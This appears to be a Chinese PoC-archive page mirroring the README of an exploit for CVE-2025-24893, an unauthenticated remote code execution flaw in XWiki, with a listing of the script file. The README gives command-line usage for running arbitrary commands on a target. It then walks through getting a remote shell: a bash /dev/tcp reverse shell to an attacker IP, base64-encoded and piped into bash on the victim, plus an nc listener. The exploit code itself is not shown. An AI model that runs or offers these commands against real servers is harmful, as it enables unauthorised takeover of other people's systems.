关联漏洞
            
        
        
            介绍
            # CVE-2025-24893 - XWiki Remote Code Execution (RCE)
An updated proof-of-concept (PoC) exploit for **CVE-2025-24893**, a critical unauthenticated RCE vulnerability in [XWiki](https://xwiki.org/). This version improves on the original by allowing arbitrary shell command execution and clean reverse shell injection.
> By: [HexHunter404](https://github.com/dhiaZnaidi)
---
## ⚠️ Warning
This code is provided for **educational and authorized penetration testing purposes only**.  
**Do not use it on systems you do not own or have explicit permission to test.**
---
## ✨ Features
- Supports command execution via `bash -c '<command>'`
- Fully supports reverse shells (via base64 to bypass Groovy issues)
- Improved handling of command output
- Preserves `/xwiki` path and avoids redirect loops
---
## 🐍 Usage
```
python3 CVE-2025-24893-PoC.py -u http://<target>/xwiki -c "<command>"
```
---
## 🐚 Getting a Reverse Shell
. Base64-encode your reverse shell
```
echo "bash -i >& /dev/tcp/[IP]/4444 0>&1" | base64
```
. Send it using the PoC
```
python3  CVE-2025-24893-PoC.py -u [URL] -c "echo [Base64 Payload] | base64 -d | bash"
```
. Set up your listener
```
nc -lvnp 4444
```
If successful, you'll catch a shell
        
        文件快照
        
            
                
 [4.0K]  /data/pocs/68f8fd823edf482505dd95ad644380b2b276f49e
├── [2.2K]  CVE-2025-24893-PoC.py
└── [1.2K]  README.md
0 directories, 2 files
                
             
         
        备注
        
            
                1. 建议优先通过来源进行访问。
                2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
                3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。